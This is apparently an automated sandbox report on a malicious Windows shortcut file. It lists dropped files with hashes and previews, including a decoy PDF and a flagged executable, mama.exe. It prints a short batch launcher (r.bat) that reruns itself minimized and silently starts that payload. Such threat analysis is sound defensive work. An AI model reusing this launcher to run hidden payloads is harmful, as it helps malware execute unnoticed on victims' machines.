                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_secnhedj.fim.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yxnt21eb.gug.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhp3s2rb.kqp.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-27 02-47-51-531.log

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with very long lines (393)
                                                        Category:dropped
                                                        Size (bytes):16525
                                                        Entropy (8bit):5.361022727805069
                                                        Encrypted:false
                                                        SSDEEP:384:cBD67lQV4j1MOuD/btX+wknz+fzTqyorqz3tVFr84AbAYpfFWbWt+Fjwn0z5O+Wf:4M5
                                                        MD5:70A2D078BEFD5E910EE035832171B399
                                                        SHA1:1AB91914ECD7852E512C73437D30013594A16FB0
                                                        SHA-256:2B55DE84E5446FD295128DAD5827122E98AC784F96A1F422B711B14E8F7DB1ED
                                                        SHA-512:9FF36D4E320A8791AB0B87F24CAB4CBE777D9E8A3A64D26AF419132CDFDFCCD9A253EE9854032C4C87C546187951077F869CBCBDC9513278C557FC4895C7DBBC
                                                        Malicious:false
                                                        Preview:SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:158+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=1936179e-ff16-44f8-b471-8d99801d7fe3.1696501837158 Timestamp=2023-10-05T12:30:37:159+0200 ThreadID=4884 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):15114
                                                        Entropy (8bit):5.349760035081946
                                                        Encrypted:false
                                                        SSDEEP:384:VlT4bx6TByrWh/VNeEsAEVIpV6jXgNJeLwTXSGibLJydnAUHRQkjRUR4VDlmfmel:Vpm
                                                        MD5:361A47CCEB2AD85E39FAF112FC26661D
                                                        SHA1:B68CC46EB5AB6C61D95541B9DE8EEA4E25F18B36
                                                        SHA-256:7358F5B673BD453AA0A3D8441635BEF30060E57A4027129BEDB24D13164E11FA
                                                        SHA-512:324081F52A6CC0A44499C50F491A2E4352FDBB18927B5BA12D91128C6295EAB459398D42CD364D1F3320B16735B3100CD31B70F02EB3CCA71BD1D0827D33EA56
                                                        Malicious:false
                                                        Preview:SessionID=40a129b2-c3b2-4008-b823-fa17b5fca88a.1735285671552 Timestamp=2024-12-27T02:47:51:552-0500 ThreadID=3544 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=40a129b2-c3b2-4008-b823-fa17b5fca88a.1735285671552 Timestamp=2024-12-27T02:47:51:553-0500 ThreadID=3544 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=40a129b2-c3b2-4008-b823-fa17b5fca88a.1735285671552 Timestamp=2024-12-27T02:47:51:553-0500 ThreadID=3544 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=40a129b2-c3b2-4008-b823-fa17b5fca88a.1735285671552 Timestamp=2024-12-27T02:47:51:553-0500 ThreadID=3544 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=40a129b2-c3b2-4008-b823-fa17b5fca88a.1735285671552 Timestamp=2024-12-27T02:47:51:553-0500 ThreadID=3544 Component=ngl-lib_NglAppLib Description="SetConf

                                                        C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):29752
                                                        Entropy (8bit):5.402552891007544
                                                        Encrypted:false
                                                        SSDEEP:192:zcbaIGkcbIcbiIICcbBOQQ0fQNCHPaPOhWPOA3mbSAcbsGC9GZPOdIzZMJzV3Zmk:EGvIcNYdQ1Y
                                                        MD5:E6C0AA81F8EE14E1846FD5123109F85C
                                                        SHA1:0C056CAED52B32ECA21E04F400248C5C7D973E7E
                                                        SHA-256:C6F96104A94914319F9D8A3542161D64CE79A56A137041CF4255D00D2668ED0C
                                                        SHA-512:AFC21A8819D4A36821483364C5776AA47A6894CD6228AD7629B3D48299D93BDE7329941AF5FDE82734C7B3CDA32BFA348A71EA3A7599620571A6CA015A760FCC
                                                        Malicious:false
                                                        Preview:05-10-2023 11:50:33:.---2---..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 11:50:33:.Closing File..05-10-

                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\0f326a7f-6f7b-43a9-8780-636bc2fcd2c7.tmp

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                        Category:dropped
                                                        Size (bytes):386528
                                                        Entropy (8bit):7.9736851559892425
                                                        Encrypted:false
                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                        Malicious:false
                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\691f6303-fd50-4a0c-beb5-e64b46506f26.tmp

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                        Category:dropped
                                                        Size (bytes):1407294
                                                        Entropy (8bit):7.97605879016224
                                                        Encrypted:false
                                                        SSDEEP:24576:/YkwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:DwZG2b3mlind9i4ufFXpAXkrfUs0qWLk
                                                        MD5:38ED8E7B44D526DDA0F3E7608AF1AFA1
                                                        SHA1:45E30A6789382E29AC870CCF92B514FB95742C45
                                                        SHA-256:7B277E2332AE55A014D8C37CCC879D165E33315437F6197BEB153CD75E4EFBBF
                                                        SHA-512:7169B1E4B2895A91FA0FBE4297CB70BE56D733084653334BB4E8421382F8F761DAD11B5D87277E0286A7C16CB53A2C79F96BB45F433D776E82A7CF45EA25121C
                                                        Malicious:false
                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\8cc8ccd1-8b77-4007-a83f-bf9e24bc68a5.tmp

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                        Category:dropped
                                                        Size (bytes):758601
                                                        Entropy (8bit):7.98639316555857
                                                        Encrypted:false
                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                        MD5:3A49135134665364308390AC398006F1
                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                        Malicious:false
                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                        C:\Users\user\AppData\Local\Temp\acrocef_low\8f4d31cc-9858-489a-85fc-8b982be0c6cc.tmp

                                                        Download File
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                        Category:dropped
                                                        Size (bytes):1419751
                                                        Entropy (8bit):7.976496077007677
                                                        Encrypted:false
                                                        SSDEEP:24576:/bWL07oXGZfqZwYIGNPZdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TWLxXGZSZwZGH3mlind9i4ufFXpAXkru
                                                        MD5:1692C6AD02530631CD5B90F95E5EE6B0
                                                        SHA1:CB1D18D7336B71A7F85BC0F884F124B8070553A7
                                                        SHA-256:9E41C6F1A614DF448C430E6DA66B82485B0871B8CD94112453055DC6F492F144
                                                        SHA-512:36C8C520F68037EA393D8026A3B1515AE05F874B12578FF17DD9B1DD5C582B622ADDA2434D25F469C21FA743873A3B33CCCB16A2CEDB0B0C50D9E25361B61D5E
                                                        Malicious:false
                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                        C:\Users\user\AppData\Local\Temp\r.bat

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):145
                                                        Entropy (8bit):4.955210469798106
                                                        Encrypted:false
                                                        SSDEEP:3:CxKbbYx32/r4lwxQVLX65RSvWKTnMEREaKC5WjvdMRSvy:Cx+bYc/gwa+5UvrnFiaZ5QFMUvy
                                                        MD5:16A0402583FF6B418285B6A5189EB5AA
                                                        SHA1:0D4885A0CC61A634209EF54A6820A665D59A3D2C
                                                        SHA-256:224BC1F4A1E2A441D186D3AEDCB3302312F10174ECE6F914B86697B352F8F953
                                                        SHA-512:585A6C4F6A3AC6EA971223A2C3CFAE36469DDD5F6C9F9F4A2DB0E542755354DE64FF5D4D75DE6F8241AC7EC7F04922337A292B2A4EDFFFCAF541F26A9D9AE9D6
                                                        Malicious:true
                                                        Preview:if not DEFINED IS_MNMZD set IS_MNMZD=1 && start "" /min "%~dpnx0" %* && exit ..start /min C:\Users\user\AppData\Roaming\mama.exe && exit ..exit..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6220
                                                        Entropy (8bit):3.732438111462404
                                                        Encrypted:false
                                                        SSDEEP:48:yM0uNr2Cg2MoU2flVukvhkvklCyw0gP4uilL2SogZodv4uilG2SogZoJ1:AkiCgl4ekvhkvCCt54ui1Hu4uiOHK
                                                        MD5:B423F43B0F60F28E0C36B964ECEC54C0
                                                        SHA1:D31D212624B4A723A8D348CE32020BA2C492AB8C
                                                        SHA-256:FAFC1EA6289F57CECB34F73E68DF121F57F74D1E04BF5599BAD7BD9C4A98A4CB
                                                        SHA-512:9A63C210F1AC7A22113610723E6AADCDB44070DF9305A083D23F30BF6BFB0E5936F5AA2C605E27BD9086CED04DC30ACCEC288F209B4D9640DE255A3866919653
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ....N.5q......3X..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q.....W.3X..r..3X......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.=...........................c..A.p.p.D.a.t.a...B.V.1......Y.=..Roaming.@......EW)N.Y.=...........................NK.R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.=..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)NEW.S...........................|".W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)NEW.S....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)NEW.S....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.=................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B3AMX6P544VGHNQLSAAE.temp

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6220
                                                        Entropy (8bit):3.732438111462404
                                                        Encrypted:false
                                                        SSDEEP:48:yM0uNr2Cg2MoU2flVukvhkvklCyw0gP4uilL2SogZodv4uilG2SogZoJ1:AkiCgl4ekvhkvCCt54ui1Hu4uiOHK
                                                        MD5:B423F43B0F60F28E0C36B964ECEC54C0
                                                        SHA1:D31D212624B4A723A8D348CE32020BA2C492AB8C
                                                        SHA-256:FAFC1EA6289F57CECB34F73E68DF121F57F74D1E04BF5599BAD7BD9C4A98A4CB
                                                        SHA-512:9A63C210F1AC7A22113610723E6AADCDB44070DF9305A083D23F30BF6BFB0E5936F5AA2C605E27BD9086CED04DC30ACCEC288F209B4D9640DE255A3866919653
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ....N.5q......3X..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q.....W.3X..r..3X......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.=...........................c..A.p.p.D.a.t.a...B.V.1......Y.=..Roaming.@......EW)N.Y.=...........................NK.R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.=..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)NEW.S...........................|".W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)NEW.S....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)NEW.S....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.=................

                                                        C:\Users\user\AppData\Roaming\ggg.pdf

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PDF document, version 1.4, 6 pages
                                                        Category:dropped
                                                        Size (bytes):1348011
                                                        Entropy (8bit):7.644353784937569
                                                        Encrypted:false
                                                        SSDEEP:24576:RpALBW4Dw5KYgPDgbECYMz50vXxkRAJbeDfTnUxGnnlv:kBW4MKYgcBYMzCvSUqDfzomlv
                                                        MD5:8BB097B11BDAA4AD387D7E648712D4D3
                                                        SHA1:70B3BEC7D52D13548EEE3B71E748C6C3D011F8C3
                                                        SHA-256:F42E4CB924D4B8023827477FB136664A8426CB5AA208660288F4278CD523A5A4
                                                        SHA-512:6F929BB7FD157750D1F152C5837344CA20FE6A51284F58305AB1D5D2F067859C5EA0AC5FAD6AE4514654A112F49214D359DB5522FE416A138B4004088DF423D9
                                                        Malicious:false
                                                        Preview:%PDF-1.4.%.....1 0 obj.<<./CreationDate(D:20240222130353+05'00')./Creator(PDFsharp 1.51.5185 \(www.pdfsharp.com\))./Producer(PDFsharp 1.51.5185 \(www.pdfsharp.com\)).>>.endobj.2 0 obj.<<./Type/Catalog./Pages 3 0 R./Metadata 23 0 R.>>.endobj.3 0 obj.<<./Type/Pages./Count 6./Kids[4 0 R 8 0 R 11 0 R 14 0 R 17 0 R 20 0 R].>>.endobj.4 0 obj.<<./Type/Page./MediaBox[0 0 595.08 841.68]./Parent 3 0 R./Contents 5 0 R./Resources.<<./ProcSet [/PDF/Text/ImageB/ImageC/ImageI]./ExtGState.<<./GS0 6 0 R.>>./XObject.<<./I0 7 0 R.>>.>>./Group.<<./CS/DeviceRGB./S/Transparency.>>.>>.endobj.5 0 obj.<<./Length 56./Filter/FlateDecode.>>.stream.x.+.*.2P...t.}.`...b.B.SKS=...............i..........F...endstream.endobj.6 0 obj.<<./Type/ExtGState./ca 1.>>.endobj.7 0 obj.<<./Type/XObject./Subtype/Image./Length 123720./Filter/DCTDecode./Interpolate true./Width 1653./Height 2338./BitsPerComponent 8./ColorSpace/DeviceRGB.>>.stream.......JFIF..............Exif..MM.*.............................u..........."...........

                                                        C:\Users\user\AppData\Roaming\mama.exe

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4277248
                                                        Entropy (8bit):7.796835542143392
                                                        Encrypted:false
                                                        SSDEEP:98304:h+Dc6yHfpXZa1ZUVTZ2zsFi840WiRoYIUF4ZxStM3bQR:w9ylZIUVt2zd8rnH4jStM3bg
                                                        MD5:72B6B07175EF611CE7DAA959A1248AAE
                                                        SHA1:BEE9D33D83C98A7C2C3C9D0EB671FA1D53328378
                                                        SHA-256:8E6AE3B356D2205296FEC0761DAA461A311190E50E0E611699EBB4AAD6E6CD77
                                                        SHA-512:56F0EE5BA99A55F05BFEA0252B544D6DCAC6CC22DBF430E228BABD1520A14EA76429FCC8F67BCC0425F8D573211A1D1B47BA6164C136D8C2A85A26030CAE9F52
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....9ig..................>..f........>.......>...@...........................B..................@....................@.......?.......A..6...................0@.............................. @.......................?.d.....?.x....................text.....>.......>................. ..`.itext..P.....>.......>............. ..`.data...h}....>..~....>.............@....bss....._...p?..........................idata........?......\?.............@....didata.x.....?......t?.............@....edata........@......x?.............@..@.tls.... .....@..........................rdata..\.... @......z?.............@..@.reloc.......0@......|?.............@..B.rsrc....6....A..6....A.............@..@..............B......DA.............@..@................

                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                        Download File
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):55
                                                        Entropy (8bit):4.306461250274409
                                                        Encrypted:false
                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                        Malicious:false
                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                        Static File Info

                                                        General

                                                        File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                        Entropy (8bit):2.7195547483384943
                                                        TrID:
                                                        • Windows Shortcut (20020/1) 100.00%
                                                        File name:vreFmptfUu.lnk
                                                        File size:2'472 bytes
                                                        MD5:0fd3c13d822c330db0ff496a85ba3d91
                                                        SHA1:418fca575accf1c328dd30ce218072c278fcbd37
